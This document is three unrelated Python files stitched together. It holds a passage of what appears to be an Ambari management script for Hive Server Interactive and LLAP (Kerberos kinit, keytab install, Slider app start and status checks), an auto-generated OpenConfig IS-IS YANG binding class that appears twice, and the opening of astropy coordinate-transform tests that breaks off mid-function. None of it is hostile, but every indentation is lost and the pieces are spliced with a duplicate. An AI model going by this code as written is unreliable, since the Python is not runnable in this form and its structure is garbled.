Logger.info("Executing Hive Server Interactive Stack Upgrade pre-restart")
import params
env.set_params(params)
if params.version and check_stack_feature(StackFeature.ROLLING_UPGRADE, params.version):
stack_select.select("hive-server2-hive2", params.version)
conf_select.select(params.stack_name, "hive2", params.version)
# Copy hive.tar.gz and tez.tar.gz used by Hive Interactive to HDFS
resource_created = copy_to_hdfs(
"hive2",
params.user_group,
params.hdfs_user,
host_sys_prepped=params.host_sys_prepped)
resource_created = copy_to_hdfs(
"tez_hive2",
params.user_group,
params.hdfs_user,
host_sys_prepped=params.host_sys_prepped) or resource_created
if resource_created:
params.HdfsResource(None, action="execute")
def start(self, env, upgrade_type=None):
import params
env.set_params(params)
self.configure(env)
if params.security_enabled:
# Do the security setup, internally calls do_kinit()
self.setup_security()
# TODO : We need have conditional [re]start of LLAP once "status check command" for LLAP is ready.
# Check status and based on that decide on [re]starting.
# Start LLAP before Hive Server Interactive start.
status = self._llap_start(env)
if not status:
raise Fail("Skipping START of Hive Server Interactive since LLAP app couldn't be STARTED.")
# TODO : test the workability of Ranger and Hive2 during upgrade
setup_ranger_hive_interactive(upgrade_type=upgrade_type)
hive_service_interactive('hiveserver2', action='start', upgrade_type=upgrade_type)
def stop(self, env, upgrade_type=None):
import params
env.set_params(params)
if params.security_enabled:
self.do_kinit()
# Stop Hive Interactive Server first
hive_service_interactive('hiveserver2', action='stop')
self._llap_stop(env)
def status(self, env):
import status_params
env.set_params(status_params)
# We are not doing 'llap' status check done here as part of status check for 'HSI', as 'llap' status
# check is a heavy weight operation.
pid_file = format("{hive_pid_dir}/{hive_interactive_pid}")
# Recursively check all existing gmetad pid files
check_process_status(pid_file)
def security_status(self, env):
import status_params
env.set_params(status_params)
if status_params.security_enabled:
props_value_check = {"hive.server2.authentication": "KERBEROS",
"hive.metastore.sasl.enabled": "true",
"hive.security.authorization.enabled": "true"}
props_empty_check = ["hive.server2.authentication.kerberos.keytab",
"hive.server2.authentication.kerberos.principal",
"hive.server2.authentication.spnego.principal",
"hive.server2.authentication.spnego.keytab"]
props_read_check = ["hive.server2.authentication.kerberos.keytab",
"hive.server2.authentication.spnego.keytab"]
hive_site_props = build_expectations('hive-site', props_value_check, props_empty_check,
props_read_check)
hive_expectations ={}
hive_expectations.update(hive_site_props)
security_params = get_params_from_filesystem(status_params.hive_server_interactive_conf_dir,
{'hive-site.xml': FILE_TYPE_XML})
result_issues = validate_security_config_properties(security_params, hive_expectations)
if not result_issues: # If all validations passed successfully
try:
# Double check the dict before calling execute
if 'hive-site' not in security_params \
or 'hive.server2.authentication.kerberos.keytab' not in security_params['hive-site'] \
or 'hive.server2.authentication.kerberos.principal' not in security_params['hive-site'] \
or 'hive.server2.authentication.spnego.keytab' not in security_params['hive-site'] \
or 'hive.server2.authentication.spnego.principal' not in security_params['hive-site']:
self.put_structured_out({"securityState": "UNSECURED"})
self.put_structured_out({"securityIssuesFound": "Keytab file or principal are not set property."})
return
cached_kinit_executor(status_params.kinit_path_local,
status_params.hive_user,
security_params['hive-site']['hive.server2.authentication.kerberos.keytab'],
security_params['hive-site']['hive.server2.authentication.kerberos.principal'],
status_params.hostname,
status_params.tmp_dir)
cached_kinit_executor(status_params.kinit_path_local,
status_params.hive_user,
security_params['hive-site']['hive.server2.authentication.spnego.keytab'],
security_params['hive-site']['hive.server2.authentication.spnego.principal'],
status_params.hostname,
status_params.tmp_dir)
self.put_structured_out({"securityState": "SECURED_KERBEROS"})
except Exception as e:
self.put_structured_out({"securityState": "ERROR"})
self.put_structured_out({"securityStateErrorInfo": str(e)})
else:
issues = []
for cf in result_issues:
issues.append("Configuration file %s did not pass the validation. Reason: %s" % (cf, result_issues[cf]))
self.put_structured_out({"securityIssuesFound": ". ".join(issues)})
self.put_structured_out({"securityState": "UNSECURED"})
else:
self.put_structured_out({"securityState": "UNSECURED"})
def restart_llap(self, env):
"""
Custom command to Restart LLAP
"""
Logger.info("Custom Command to retart LLAP")
import params
env.set_params(params)
if params.security_enabled:
self.do_kinit()
self._llap_stop(env)
self._llap_start(env)
def _llap_stop(self, env):
import params
Logger.info("Stopping LLAP")
SLIDER_APP_NAME = "llap0"
stop_cmd = ["slider", "stop", SLIDER_APP_NAME]
code, output, error = shell.call(stop_cmd, user=params.hive_user, stderr=subprocess.PIPE, logoutput=True)
if code == 0:
Logger.info(format("Stopped {SLIDER_APP_NAME} application on Slider successfully"))
elif code == 69 and output is not None and "Unknown application instance" in output:
Logger.info(format("Application {SLIDER_APP_NAME} was already stopped on Slider"))
else:
raise Fail(format("Could not stop application {SLIDER_APP_NAME} on Slider. {error}\n{output}"))
# Will exit with code 4 if need to run with "--force" to delete directories and registries.
Execute(('slider', 'destroy', SLIDER_APP_NAME, "--force"),
user=params.hive_user,
timeout=30,
ignore_failures=True,
)
"""
Controls the start of LLAP.
"""
def _llap_start(self, env, cleanup=False):
import params
env.set_params(params)
Logger.info("Starting LLAP")
LLAP_PACKAGE_CREATION_PATH = Script.get_tmp_dir()
LLAP_APP_NAME = 'llap0'
unique_name = "llap-slider%s" % datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S')
cmd = format("{stack_root}/current/hive-server2-hive2/bin/hive --service llap --instances {params.num_llap_nodes}"
" --slider-am-container-mb {params.slider_am_container_mb} --size {params.llap_daemon_container_size}m "
" --cache {params.hive_llap_io_mem_size}m --xmx {params.llap_heap_size}m --loglevel {params.llap_log_level}"
" --output {LLAP_PACKAGE_CREATION_PATH}/{unique_name}")
if params.security_enabled:
llap_keytab_splits = params.hive_llap_keytab_file.split("/")
Logger.debug("llap_keytab_splits : {0}".format(llap_keytab_splits))
cmd += format(" --slider-keytab-dir .slider/keytabs/{params.hive_user}/ --slider-keytab "
"{llap_keytab_splits[4]} --slider-principal {params.hive_llap_principal}")
# Append args.
llap_java_args = InlineTemplate(params.llap_app_java_opts).get_content()
cmd += format(" --args \" {llap_java_args}\"")
run_file_path = None
try:
Logger.info(format("Command: {cmd}"))
code, output, error = shell.checked_call(cmd, user=params.hive_user, stderr=subprocess.PIPE, logoutput=True)
if code != 0 or output is None:
raise Fail("Command failed with either non-zero return code or no output.")
# E.g., output:
# Prepared llap-slider-05Apr2016/run.sh for running LLAP on Slider
exp = r"Prepared (.*?run.sh) for running LLAP"
run_file_path = None
out_splits = output.split("\n")
for line in out_splits:
line = line.strip()
m = re.match(exp, line, re.I)
if m and len(m.groups()) == 1:
run_file_name = m.group(1)
run_file_path = os.path.join(params.hive_user_home_dir, run_file_name)
break
if not run_file_path:
raise Fail("Did not find run.sh file in output: " + str(output))
Logger.info(format("Run file path: {run_file_path}"))
Execute(run_file_path, user=params.hive_user)
Logger.info("Submitted LLAP app name : {0}".format(LLAP_APP_NAME))
# We need to check the status of LLAP app to figure out it got
# launched properly and is in running state. Then go ahead with Hive Interactive Server start.
status = self.check_llap_app_status(LLAP_APP_NAME, params.num_retries_for_checking_llap_status)
if status:
Logger.info("LLAP app '{0}' deployed successfully.".format(LLAP_APP_NAME))
return True
else:
Logger.error("LLAP app '{0}' deployment unsuccessful.".format(LLAP_APP_NAME))
return False
except:
# Attempt to clean up the packaged application, or potentially rename it with a .bak
if run_file_path is not None and cleanup:
try:
parent_dir = os.path.dirname(run_file_path)
if os.path.isdir(parent_dir):
shutil.rmtree(parent_dir)
except Exception, e:
Logger.error("Could not cleanup LLAP app package. Error: " + str(e))
# throw the original exception
raise
"""
Does kinit and copies keytab for Hive/LLAP to HDFS.
"""
def setup_security(self):
import params
self.do_kinit()
# Copy params.hive_llap_keytab_file to hdfs://<host>:<port>/user/<hive_user>/.slider/keytabs/<hive_user> , required by LLAP
slider_keytab_install_cmd = format("slider install-keytab --keytab {params.hive_llap_keytab_file} --folder {params.hive_user} --overwrite")
Execute(slider_keytab_install_cmd, user=params.hive_user)
def do_kinit(self):
import params
hive_interactive_kinit_cmd = format("{kinit_path_local} -kt {params.hive_server2_keytab} {params.hive_principal}; ")
Execute(hive_interactive_kinit_cmd, user=params.hive_user)
llap_kinit_cmd = format("{kinit_path_local} -kt {params.hive_llap_keytab_file} {params.hive_llap_principal}; ")
Execute(llap_kinit_cmd, user=params.hive_user)
"""
Get llap app status data.
"""
def _get_llap_app_status_info(self, app_name):
import status_params
LLAP_APP_STATUS_CMD_TIMEOUT = 0
llap_status_cmd = format("{stack_root}/current/hive-server2-hive2/bin/hive --service llapstatus --name {app_name} --findAppTimeout {LLAP_APP_STATUS_CMD_TIMEOUT}")
code, output, error = shell.checked_call(llap_status_cmd, user=status_params.hive_user, stderr=subprocess.PIPE,
logoutput=False)
Logger.info("Received 'llapstatus' command 'output' : {0}".format(output))
return self._make_valid_json(output)
"""
Remove extra lines from 'llapstatus' status output (eg: because of MOTD logging) so as to have a valid JSON data to be passed in
to JSON converter.
"""
def _make_valid_json(self, output):
'''
Note: It is assumed right now that extra lines will be only at the start and not at the end.
Sample expected JSON to be passed for 'loads' is either of the form :
Case 'A':
{
"amInfo" : {
"appName" : "llap0",
"appType" : "org-apache-slider",
"appId" : "APP1",
"containerId" : "container_1466036628595_0010_01_000001",
"hostname" : "hostName",
"amWebUrl" : "http://hostName:port/"
},
"state" : "LAUNCHING",
....
"desiredInstances" : 1,
"liveInstances" : 0,
....
....
}
or
Case 'B':
{
"state" : "APP_NOT_FOUND"
}
'''
splits = output.split("\n")
len_splits = len(splits)
if (len_splits < 3):
raise Fail ("Malformed JSON data received from 'llapstatus' command. Exiting ....")
marker_idx = None # To detect where from to start reading for JSON data
for idx, split in enumerate(splits):
curr_elem = split.strip()
if idx+2 > len_splits:
raise Fail("Iterated over the received 'llapstatus' comamnd. Couldn't validate the received output for JSON parsing.")
next_elem = (splits[(idx + 1)]).strip()
if curr_elem == "{":
if next_elem == "\"amInfo\" : {" and (splits[len_splits-1]).strip() == '}':
# For Case 'A'
marker_idx = idx
break;
elif idx+3 == len_splits and next_elem.startswith('"state" : ') and (splits[idx + 2]).strip() == '}':
# For Case 'B'
marker_idx = idx
break;
Logger.info("Marker index for start of JSON data for 'llapsrtatus' comamnd : {0}".format(marker_idx))
# Remove extra logging from possible JSON output
if marker_idx is None:
raise Fail("Couldn't validate the received output for JSON parsing.")
else:
if marker_idx != 0:
del splits[0:marker_idx]
Logger.info("Removed lines: '1-{0}' from the received 'llapstatus' output to make it valid for JSON parsing.".format(marker_idx))
scanned_output = '\n'.join(splits)
llap_app_info = json.loads(scanned_output)
return llap_app_info
"""
Checks llap app status. The states can be : 'COMPLETE', 'APP_NOT_FOUND', 'RUNNING_PARTIAL', 'RUNNING_ALL' & 'LAUNCHING'.
if app is in 'APP_NOT_FOUND', 'RUNNING_PARTIAL' and 'LAUNCHING' state:
we wait for 'num_times_to_wait' to have app in (1). 'RUNNING_ALL' or (2). 'RUNNING_PARTIAL'
state with 80% or more 'desiredInstances' running and Return True
else :
Return False
Parameters: llap_app_name : deployed llap app name.
num_retries : Number of retries to check the LLAP app status.
"""
def check_llap_app_status(self, llap_app_name, num_retries):
# counters based on various states.
curr_time = time.time()
if num_retries <= 0:
num_retries = 2
if num_retries > 20:
num_retries = 20
@retry(times=num_retries, sleep_time=2, err_class=Fail)
def do_retries():
live_instances = 0
desired_instances = 0
percent_desired_instances_to_be_up = 80 # Used in 'RUNNING_PARTIAL' state.
llap_app_info = self._get_llap_app_status_info(llap_app_name)
if llap_app_info is None or 'state' not in llap_app_info:
Logger.error("Malformed JSON data received for LLAP app. Exiting ....")
return False
if llap_app_info['state'].upper() == 'RUNNING_ALL':
Logger.info(
"LLAP app '{0}' in '{1}' state.".format(llap_app_name, llap_app_info['state']))
return True
elif llap_app_info['state'].upper() == 'RUNNING_PARTIAL':
# Check how many instances were up.
if 'liveInstances' in llap_app_info and 'desiredInstances' in llap_app_info:
live_instances = llap_app_info['liveInstances']
desired_instances = llap_app_info['desiredInstances']
else:
Logger.info(
"LLAP app '{0}' is in '{1}' state, but 'instances' information not available in JSON received. " \
"Exiting ....".format(llap_app_name, llap_app_info['state']))
Logger.info(llap_app_info)
return False
if desired_instances == 0:
Logger.info("LLAP app '{0}' desired instance are set to 0. Exiting ....".format(llap_app_name))
return False
percentInstancesUp = 0
if live_instances > 0:
percentInstancesUp = float(live_instances) / desired_instances * 100
if percentInstancesUp >= percent_desired_instances_to_be_up:
Logger.info("LLAP app '{0}' in '{1}' state. Live Instances : '{2}' >= {3}% of Desired Instances : " \
"'{4}'.".format(llap_app_name, llap_app_info['state'],
llap_app_info['liveInstances'],
percent_desired_instances_to_be_up,
llap_app_info['desiredInstances']))
return True
else:
Logger.info("LLAP app '{0}' in '{1}' state. Live Instances : '{2}'. Desired Instances : " \
"'{3}' after {4} secs.".format(llap_app_name, llap_app_info['state'],
llap_app_info['liveInstances'],
llap_app_info['desiredInstances'],
time.time() - curr_time))
raise Fail("App state is RUNNING_PARTIAL. Live Instances : '{0}', Desired Instance : '{1}'".format(llap_app_info['liveInstances'],
llap_app_info['desiredInstances']))
elif llap_app_info['state'].upper() in ['APP_NOT_FOUND', 'LAUNCHING', 'COMPLETE']:
status_str = format("LLAP app '{0}' current state is {1}.".format(llap_app_name, llap_app_info['state']))
Logger.info(status_str)
raise Fail(status_str)
else: # Covers any unknown that we get.
Logger.info(
"LLAP app '{0}' current state is '{1}'. Expected : 'RUNNING'.".format(llap_app_name, llap_app_info['state']))
return False
try:
status = do_retries()
return status
except Exception, e:
Logger.info("LLAP app '{0}' did not come up after a wait of {1} seconds.".format(llap_app_name,
time.time() - curr_time))
traceback.print_exc()
return False
def get_log_folder(self):
import params
return params.hive_log_dir
def get_user(self):
import params
return params.hive_user
@OsFamilyImpl(os_family=OSConst.WINSRV_FAMILY)
class HiveServerInteractiveWindows(HiveServerInteractive):
def status(self, env):
pass
if __name__ == "__main__":
HiveServerInteractive().execute()
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
from . import neighbors
class isis_neighbor_attribute(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/isis-neighbor-attribute. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines list of ISIS topology neighbors
for extended ISIS LSP(multiple system IDs).
"""
__slots__ = ("_path_helper", "_extmethods", "__state", "__neighbors")
_yang_name = "isis-neighbor-attribute"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
self.__neighbors = YANGDynClass(
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"isis-neighbor-attribute",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/state (container)
YANG Description: This container describes IS neighbor attribute state.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container describes IS neighbor attribute state.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
def _get_neighbors(self):
"""
Getter method for neighbors, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/neighbors (container)
YANG Description: This container describes IS neighbors.
"""
return self.__neighbors
def _set_neighbors(self, v, load=False):
"""
Setter method for neighbors, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/neighbors (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_neighbors is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_neighbors() directly.
YANG Description: This container describes IS neighbors.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """neighbors must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=neighbors.neighbors, is_container='container', yang_name="neighbors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__neighbors = t
if hasattr(self, "_set"):
self._set()
def _unset_neighbors(self):
self.__neighbors = YANGDynClass(
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
neighbors = __builtin__.property(_get_neighbors)
_pyangbind_elements = OrderedDict([("state", state), ("neighbors", neighbors)])
from . import state
from . import neighbors
class isis_neighbor_attribute(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/isis-neighbor-attribute. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines list of ISIS topology neighbors
for extended ISIS LSP(multiple system IDs).
"""
__slots__ = ("_path_helper", "_extmethods", "__state", "__neighbors")
_yang_name = "isis-neighbor-attribute"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
self.__neighbors = YANGDynClass(
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"isis-neighbor-attribute",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/state (container)
YANG Description: This container describes IS neighbor attribute state.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container describes IS neighbor attribute state.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
def _get_neighbors(self):
"""
Getter method for neighbors, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/neighbors (container)
YANG Description: This container describes IS neighbors.
"""
return self.__neighbors
def _set_neighbors(self, v, load=False):
"""
Setter method for neighbors, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/isis_neighbor_attribute/neighbors (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_neighbors is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_neighbors() directly.
YANG Description: This container describes IS neighbors.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """neighbors must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=neighbors.neighbors, is_container='container', yang_name="neighbors", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__neighbors = t
if hasattr(self, "_set"):
self._set()
def _unset_neighbors(self):
self.__neighbors = YANGDynClass(
base=neighbors.neighbors,
is_container="container",
yang_name="neighbors",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
neighbors = __builtin__.property(_get_neighbors)
_pyangbind_elements = OrderedDict([("state", state), ("neighbors", neighbors)])
|
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Accuracy tests for GCRS coordinate transformations, primarily to/from AltAz.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
from ... import units as u
from ...tests.helper import (pytest, remote_data,
quantity_allclose as allclose,
assert_quantity_allclose as assert_allclose)
from ...time import Time
from .. import (EarthLocation, get_sun, ICRS, GCRS, CIRS, ITRS, AltAz,
PrecessedGeocentric, CartesianRepresentation, SkyCoord,
SphericalRepresentation, UnitSphericalRepresentation,
HCRS, HeliocentricTrueEcliptic)
from ..._erfa import epv00
from .utils import randomly_sample_sphere
from ..builtin_frames.utils import get_jd12
from .. import solar_system_ephemeris
try:
import jplephem # pylint: disable=W0611
except ImportError:
HAS_JPLEPHEM = False
else:
HAS_JPLEPHEM = True
def test_icrs_cirs():
"""
Check a few cases of ICRS<->CIRS for consistency.
Also includes the CIRS<->CIRS transforms at different times, as those go
through ICRS
"""
ra, dec, dist = randomly_sample_sphere(200)
inod = ICRS(ra=ra, dec=dec)
iwd = ICRS(ra=ra, dec=dec, distance=dist*u.pc)
cframe1 = CIRS()
cirsnod = inod.transform_to(cframe1) # uses the default time
# first do a round-tripping test
inod2 = cirsnod.transform_to(ICRS)
assert_allclose(inod.ra, inod2.ra)
assert_allclose(inod.dec, inod2.dec)
# now check that a different time yields different answers
cframe2 = CIRS(obstime=Time('J2005', scale='utc'))
cirsnod2 = inod.transform_to(cframe2)
assert not allclose(cirsnod.ra, cirsnod2.ra, rtol=1e-8)
assert not allclose(cirsnod.dec, cirsnod2.dec, rtol=1e-8)
# parallax effects should be included, so with and w/o distance should be different
cirswd = iwd.transform_to(cframe1)
assert not allclose(cirswd.ra, cirsnod.ra, rtol=1e-8)
assert not allclose(cirswd.dec, cirsnod.dec, rtol=1e-8)
# and the distance should transform at least somehow
assert not allclose(cirswd.distance, iwd.distance, rtol=1e-8)
# now check that the cirs self-transform works as expected
cirsnod3 = cirsnod.transform_to(cframe1) # should be a no-op
assert_allclose(cirsnod.ra, cirsnod3.ra)
assert_allclose(cirsnod.dec, cirsnod3.dec)
cirsnod4 = cirsnod.transform_to(cframe2) # should be different
assert not allclose(cirsnod4.ra, cirsnod.ra, rtol=1e-8)
assert not allclose(cirsnod4.dec, cirsnod.dec, rtol=1e-8)
cirsnod5 = cirsnod4.transform_to(cframe1) # should be back to the same
assert_allclose(cirsnod.ra, cirsnod5.ra)
assert_allclose(cirsnod.dec, cirsnod5.dec)
ra, dec, dist = randomly_sample_sphere(200)
icrs_coords = [ICRS(ra=ra, dec=dec), ICRS(ra=ra, dec=dec, distance=dist*u.pc)]
gcrs_frames = [GCRS(), GCRS(obstime=Time('J2005', scale='utc'))]
@pytest.mark.parametrize('icoo', icrs_coords)
def test_icrs_gcrs(icoo):
"""
Check ICRS<->GCRS for consistency
"""
gcrscoo = icoo.transform_to(gcrs_frames[0]) # uses the default time
# first do a round-tripping test
icoo2 = gcrscoo.transform_to(ICRS)
assert_allclose(icoo.distance, icoo2.distance)
assert_allclose(icoo.ra, icoo2.ra)
assert_allclose(icoo.dec, icoo2.dec)
assert isinstance(icoo2.data, icoo.data.__class__)
# now check that a different time yields different answers
gcrscoo2 = icoo.transform_to(gcrs_frames[1])
assert not allclose(gcrscoo.ra, gcrscoo2.ra, rtol=1e-8, atol=1e-10*u.deg)
assert not allclose(gcrscoo.dec, gcrscoo2.dec, rtol=1e-8, atol=1e-10*u.deg)
# now check that the cirs self-transform works as expected
gcrscoo3 = gcrscoo.transform_to(gcrs_frames[0]) # should be a no-op
assert_allclose(gcrscoo.ra, gcrscoo3.ra)
assert_allclose(gcrscoo.dec, gcrscoo3.dec)
gcrscoo4 = gcrscoo.transform_to(gcrs_frames[1]) # should be different
assert not allclose(gcrscoo4.ra, gcrscoo.ra, rtol=1e-8, atol=1e-10*u.deg)
assert not allclose(gcrscoo4.dec, gcrscoo.dec, rtol=1e-8, atol=1e-10*u.deg)
gcrscoo5 = gcrscoo4.transform_to(gcrs_frames[0]) # should be back to the same
assert_allclose(gcrscoo.ra, gcrscoo5.ra, rtol=1e-8, atol=1e-10*u.deg)
assert_allclose(gcrscoo.dec, gcrscoo5.dec, rtol=1e-8, atol=1e-10*u.deg)
# also make sure that a GCRS with a different geoloc/geovel gets a different answer
# roughly a moon-like frame
